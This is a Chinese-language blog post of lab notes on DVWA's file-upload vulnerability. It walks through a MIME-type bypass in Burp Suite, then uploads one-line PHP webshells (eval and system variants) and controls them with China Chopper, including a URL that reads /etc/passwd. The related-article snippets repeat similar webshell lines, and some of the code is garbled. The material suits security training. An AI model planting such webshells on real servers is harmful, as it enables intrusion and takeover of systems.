DVWA中的upload(文件上传漏洞)

最新推荐文章于 2024-02-21 19:58:16 发布
最新推荐文章于 2024-02-21 19:58:16 发布
阅读量498 收藏 1
点赞数
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hwy2506451901/article/details/105302990
版权 
 原理: 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上传图片或者普通文本文件保存,而用户绕过上传机制上传恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上传文件操作本身是没有问题的,问题在于文件上传到服务器后,服务器怎么处理和解释文件。

准备:打开靶机后查看IP地址,在攻击机浏览器访问,进入dvwa页面

1.low等级:

低等级的没有做任何的防护所以上传图片类型或者php类型的文件都可以返回成功
**

2.medium等级:

**
提交php类型的文件发现失败,查看源代码:

发现要求必须是image或者jpeg类型的文件,注意不是格式是mine类型,所以我们可以通过burpsuite进行拦截将文件类型修改。
在这里插入图片描述
可以看到类型是二进制的字节流,所以我们将其改成image/jpeg,如下:
在这里插入图片描述
点击forward放行,可以看到上传成功
在这里插入图片描述
在提示成功前有一个目录,我们将其复制在url后,将#去掉再复制
在这里插入图片描述
然后回车键,此时如果是图片文件则会显示出来图片,如:
在这里插入图片描述
而我们现在是一句话木马的php文件所以我们将这个网址打开然后利用菜刀打开
在这里插入图片描述
地址写我们复制的网址:
在这里插入图片描述
密码是我们写入shell1.php中括号里的部分,如我们写的是

<?php @eval($_POST['chopper']);?>所以密码就是chopper,其中的@,‘’可以去掉

在这里插入图片描述
可以右击打开文件管理,于是我们可以找到我们上传的文件,可以修改删除等操作,还可以操作其他目录下的文件。
在这里插入图片描述
还可以打开终端,使用命令行的方法查看修改等如下:
在这里插入图片描述
当然如果我们在添加的时候配置数据库的话则可以右键选择数据库管理,在窗口输入SQL语句进行查看,如:select * from mysql.user等。
然后如果说我们想在靶机执行命令删除我们上转的文件的话,可以执行下列命令:
在这里插入图片描述
扩展:webshell分为小马和大马
小马:一句话木马,只有一行代码,一般是系统执行函数
大马:会进行二次编码加密
shell2.php #eval 使用php函数,例如phpinfo();在这里插入代码片

<?php eval($_REQUEST[‘wenying’];?)>

http://192.168.91.132/dvwa/vulnerabilities/uploads/shell2.php?wenying=phpinfo();

shell3.php #system 使用Linux系统命令,例如ls,cp,rm

<?php system($_REQUEST[‘wenying’];?)> http://192.168.91.132/dvwa/vulnerabilities/upload/shell3.php?wenying=cat /etc /passwd `在这里插入代码片`中国菜刀: <?php @eval($_POST['chopper']);?>

说明:REQUEST是在页面输入变量访问,POST是使用菜刀之类的工具链接,是C/S架构(客户端/服务端)。

回首。阑珊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
DVWA之File Upload (文件上传漏洞)
谢公子的博客
09-30 2万+
目录 Low: Medium: 方法一:抓包修改文件的type 方法二:00截断 High: Impossible : Low: 源代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PA...
DVWA靶场--文件上传漏洞(low、medium、high等级)
c_programj的博客
04-16 7405
dvwa靶场实践-低高三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
dvwa上传php文件,DVWA之File Upload文件上传
weixin_42177768的博客
03-18 315
1、file upload文件上传,测试界面2、security=low时的上传(1)直接上传php一句话木马,没有过滤,上传成功,根据提示路径链接菜刀(2)菜刀链接,webshell拿到3、security=medium时的上传(1)直接上传php格式文件,上传失败(2)测试上传图片格式文件,上传成功(3)使用Burp Suite工具进行两次抓包,在compare比较(4)重新上传php木马,...
DVWA篇_文件上传
求大佬师傅带
05-25 1218
记一次DVWA文件上传漏洞复现
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 1207
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
DVWA(5)文件上传(File Upload) LOW-HIGHT 操作记录
lllllaaa111的博客
11-08 932
利用文件上传漏洞,往目标网站上传一句话木马,然后你就可以在本地通过蚁剑或者国菜刀即可获取和控制整个网站目录今天带来第五期文件上传漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版,例如Samurai的Web测试框架等。
文件上传upload-labs(一)
01-08
使用xampp、phpstudy、docker搭建upload-labs,三者都可,docker最方便但是我不是太熟悉,xampp安装的时候有很多工序,所以我选择的是phpstudy搭建了靶机环境,个人觉得学习文件上传dvwa好一点,这个用来训练和...
DVWA的压缩文件安装包下载
09-30
DVWA 适合与PHPstudy合用 用于建立靶场,网络安全的相关学习
计算机病毒与防护:文件上传漏洞利用MIME校验.ppt
06-10
* * * * * * * * * * * * 目录页 文件上传漏洞利用 MIME校验 文件上传漏洞---绕过MIME检测 1)上传一句话木马 eval.php 2)上传地址 36/DVWA/vulnerabilities/upload2 文件上传漏洞利用 文件上传漏洞---绕过MIME检测...
DVWA靶场之文件上传(三个等级)
m0_55854679的博客
05-02 8254
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木马(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站上传一句话木马,然后你就可以在本地通过蚁剑或者国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面
DVWA靶场-File Upload 文件上传
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-05 1361
往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 DVWA靶场-File Inclusion 文件包含 靶场环境搭建 https://github.com/ethicalhack3r/DVWA [网络安全学习篇附]:DVWA 靶场搭建 目录 File Upload Low File Upload 核心代码 Medium File Upload 核心代码.
DVWA靶场通关教程】
最新发布
AuroraMiraitowa的博客
02-21 2133
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA 还可以手动调整靶机源码的安全级别,分别为 Low,Medium,High,Impossible,级别越高,安全防护越严格,渗透难度越大。一般 Low 级别基本没有做防护或者只是最简单的防护,很容易就能够渗透成功;
DVWA靶场通关(File Upload
m0_56010012的博客
03-17 1017
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 题目描述 常规的文件上传操作: 客户端上传: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8
DVWA靶场教程
热门推荐
wxh的博客
01-15 2万+
Burt Force(暴力破解)
DVWAUpload全级笔记
底层社会中的弱智
06-04 439
LOW: 下列代码只是实现了上传,没有任何的门槛 <?php if (isset($_POST['Upload'])) { //isset函数的意思判断是否是POST的方式上传的 $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"; $target_path = $...
DVWA靶场系列(四)—— File Upload文件上传
qq_45612828的博客
07-12 5686
DVWA靶场系列(四)—— File Upload文件上传
DVWA-文件上传upload
Cwillchris的博客
10-28 2015
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、查看源码及分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? //文件的目标路径hackable/uploads/,也就是文件上传的位置 $target_path = DVWA_WEB
DVWA文件上传漏洞
05-02
DVWA文件上传漏洞可以通过以下步骤进行利用: 1. 登录DVWA,并进入上传页面。 2. 选择要上传的文件,并将其改名为具有执行权限的文件类型(如.php、.asp等)。 3. 点击上传按钮,并捕获上传请求的数据包。 4....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值